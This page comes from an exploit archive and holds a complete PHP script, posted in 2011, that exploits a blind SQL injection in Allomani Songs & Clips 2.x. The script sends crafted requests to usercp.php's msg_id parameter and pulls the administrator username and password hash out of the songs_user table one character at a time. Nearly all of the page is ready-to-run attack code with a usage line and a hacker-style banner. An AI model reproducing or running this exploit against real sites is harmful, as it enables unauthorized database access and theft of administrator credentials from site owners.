Home / exploits Allomani Songs And Clips 2.x Blind SQL Injection
Posted on 16 August 2011
<?php /* =============================================================== Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit =============================================================== #[+]Version : 2.x #[+]Author : ahwak2000 #[+]home : tryag.cc/cc/ ~ p0c.cc/vb/ #[+]Date : 13.08.2011 #[+]E-mail : z.u5[at]hotmail.com #[+]secript home: http://allomani.com #[+]Tested On: win xp sp3 =============================================================== */ ini_set("max_execution_time",0); print_r(' ___________________________ ________________________| Allomani 2.x eXploit 0d4y |_________________________ _ _ _ _ _ _ _ _ _____ _____ _____ _____ / _ | | | | | | __ | | / _ | |// | _ | / _ / _ / _ \n| |_| | | |_| | | | / | | | |_| | | |_| / / | | | | | | | | | | | | | | | | | _ | | |/ / | | | | | | | | / /__ | |_| | | |_| | | |_| | |_| |_| |_| |_| |___/ \___| |_| |_| |_| \_ |_____| \_____/ \_____/ \_____/ _______________________________________________________________________________ z.u5@hotmail.com '); if ($argc<5) { print_r(' ----------------------------------------------------------------------------- example: php '.$argv[0].' allomain.com /demo/ user_pass user_id ----------------------------------------------------------------------------- '); die; } function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){ $host = $victim; $p = "http://".$host.$vic_dir; //$cookie = base64_encode(":".$inj.":"); $packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0 "; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) "; $packet.="Host: ".$victim." "; $packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass)."; "; $packet.="Pragma: no-cache "; $packet.="Connection: Close "; $o = @fsockopen($host, 80); if(!$o){ echo " [x] No response... "; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo " [x] 404 Not Found... Make sure of path. "; die; } return $data; } function AHWAK_GET($from){ preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out); return $out[1][0]; } $host1 = $argv[1]; $dir1=$argv[2]; $userpass=$argv[3]; $userid=$argv[4]; if ($argc > 4) { echo " Please wait... "; $login= AHWAK($host1,$dir1,$userpass,$userid,""); if(!eregi ("profile",$login)){ echo " [-] You have entered an invalid username or password. "; exit; } $truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*")); $falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*")); if ($truths == $falses) { echo " sorry: magic_quotes_gpc = On ): "; exit; } echo " [+] Getting Admin UserName And PassWord "; echo " ----------------------------------- "; for ($g = 1; $g <= 16; $g++) { //eidt for ($i = 46; $i <= 122; $i++) { $qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*")); if ($qest == $truths) { echo chr($i); } } } echo " ----------------------------------- By Ahwak2000 "; } ?>
